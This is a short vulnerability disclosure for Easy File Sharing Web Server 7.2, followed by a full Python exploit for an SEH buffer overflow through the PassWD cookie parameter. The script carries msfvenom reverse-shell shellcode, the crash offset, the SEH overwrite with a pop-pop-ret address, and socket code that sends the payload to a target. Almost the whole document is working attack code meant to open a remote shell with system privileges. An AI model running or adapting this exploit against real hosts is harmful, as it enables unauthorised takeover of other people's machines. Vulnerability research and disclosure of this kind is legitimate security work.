Disclosure of the zero-day vulnerability I found, exploited, and disclosed regarding Easy File Sharing Web Server 7.2. GET HTTP request, PassWD parameter.
Set up the application in a WinXP SP3 VM in my lab, loaded the app. Found an exploitable crash via fuzzing with Spike that was previously undisclosed. Replicated the crash using python, then refined and exploited it gaining system level privileges on the machine.
#!/usr/bin/python # Exploit Title: Easy File Sharing Web Server 7.2 - GET HTTP Request (PassWD) Buffer Overflow (SEH) # Date: 19 June 2017 # Exploit Author: clubjk # Author Contact: jk@jkcybersecurity.com # Vendor Homepage: http://www.sharing-file.com # Version: Easy File Sharing Web Server 7.2 # Tested on: WinXP SP3 # Usage: ./exploit.py # [*] Connecting to Target # [*] Successfully connected to # [*] Sending improperly formed request... # [!] Request has been sent! import socket,os,time, sys host = "" port = 80 #msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=2345 -f py -b "\x00" buf = "" buf + = "\xdb\xd2\xd9\x74\x24\xf4\x5f\xba\xb7\xe7\x7d\x1e\x29" buf + = "\xc9\xb1\x52\x83\xef\xfc\x31\x57\x13\x03\xe0\xf4\x9f" buf + = "\xeb\xf2\x13\xdd\x14\x0a\xe4\x82\x9d\xef\xd5\x82\xfa" buf + = "\x64\x45\x33\x88\x28\x6a\xb8\xdc\xd8\xf9\xcc\xc8\xef" buf + = "\x4a\x7a\x2f\xde\x4b\xd7\x13\x41\xc8\x2a\x40\xa1\xf1" buf + = "\xe4\x95\xa0\x36\x18\x57\xf0\xef\x56\xca\xe4\x84\x23" buf + = "\xd7\x8f\xd7\xa2\x5f\x6c\xaf\xc5\x4e\x23\xbb\x9f\x50" buf + = "\xc2\x68\x94\xd8\xdc\x6d\x91\x93\x57\x45\x6d\x22\xb1" buf + = "\x97\x8e\x89\xfc\x17\x7d\xd3\x39\x9f\x9e\xa6\x33\xe3" buf + = "\x23\xb1\x80\x99\xff\x34\x12\x39\x8b\xef\xfe\xbb\x58" buf + = "\x69\x75\xb7\x15\xfd\xd1\xd4\xa8\xd2\x6a\xe0\x21\xd5" buf + = "\xbc\x60\x71\xf2\x18\x28\x21\x9b\x39\x94\x84\xa4\x59" buf + = "\x77\x78\x01\x12\x9a\x6d\x38\x79\xf3\x42\x71\x81\x03" buf + = "\xcd\x02\xf2\x31\x52\xb9\x9c\x79\x1b\x67\x5b\x7d\x36" buf + = "\xdf\xf3\x80\xb9\x20\xda\x46\xed\x70\x74\x6e\x8e\x1a" buf + = "\x84\x8f\x5b\x8c\xd4\x3f\x34\x6d\x84\xff\xe4\x05\xce" buf + = "\x0f\xda\x36\xf1\xc5\x73\xdc\x08\x8e\xbb\x89\xae\xcb" buf + = "\x54\xc8\xce\xda\x8d\x45\x28\xb6\xdd\x03\xe3\x2f\x47" buf + = "\x0e\x7f\xd1\x88\x84\xfa\xd1\x03\x2b\xfb\x9c\xe3\x46" buf + = "\xef\x49\x04\x1d\x4d\xdf\x1b\x8b\xf9\x83\x8e\x50\xf9" buf + = "\xca\xb2\xce\xae\x9b\x05\x07\x3a\x36\x3f\xb1\x58\xcb" buf + = "\xd9\xfa\xd8\x10\x1a\x04\xe1\xd5\x26\x22\xf1\x23\xa6" buf + = "\x6e\xa5\xfb\xf1\x38\x13\xba\xab\x8a\xcd\x14\x07\x45" buf + = "\x99\xe1\x6b\x56\xdf\xed\xa1\x20\x3f\x5f\x1c\x75\x40" buf + = "\x50\xc8\x71\x39\x8c\x68\x7d\x90\x14\x98\x34\xb8\x3d" buf + = "\x31\x91\x29\x7c\x5c\x22\x84\x43\x59\xa1\x2c\x3c\x9e" buf + = "\xb9\x45\x39\xda\x7d\xb6\x33\x73\xe8\xb8\xe0\x74\x39" crash = "/.:/" #unusual but needed crash + = "A" * 53 #offset crash + = "\xeb\x10\x90\x90" #seh crash + = "\x05\x86\x01\x10" #pop pop ret ImageLoad.dll (WinXP SP3) crash + = "D" * 10 #junk crash + = buf #shellcode crash + = "E" * 2600 #total string needs to be about 3000 chars request = "GET /vfolder.ghp HTTP/1.1\r\n" request + = "Host: " + host + "\r\n" request + = "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + "\r\n" request + = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + "\r\n" request + = "Accept-Language: en-US,en;q=0.5" + "\r\n" request + = "Accept-Encoding: gzip, deflate" + "\r\n" request + = "Cookie: SESSIONID=16246; UserID=PassWD=" + crash + "; frmUserName=; frmUserPass=;" request + = " rememberPass=" request + = "\r\n" request + = "Connection: keep-alive" + "\r\n" request + = "If-Modified-Since: Mon, 19 Jun 2017 17:36:03 GMT" + "\r\n" print "[*] Connecting to Target " + host + "...standby..." s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try : connect = s.connect((host, port)) print "[*] Successfully connected to " + host + "!!!" except : print "[!] " + host + " didn't respond\n" sys.exit( 0 ) print "[*] Sending improperly formed request..." s.send(request + "\r\n\r\n" ) print "[!] Request has been sent!\n" s.close() |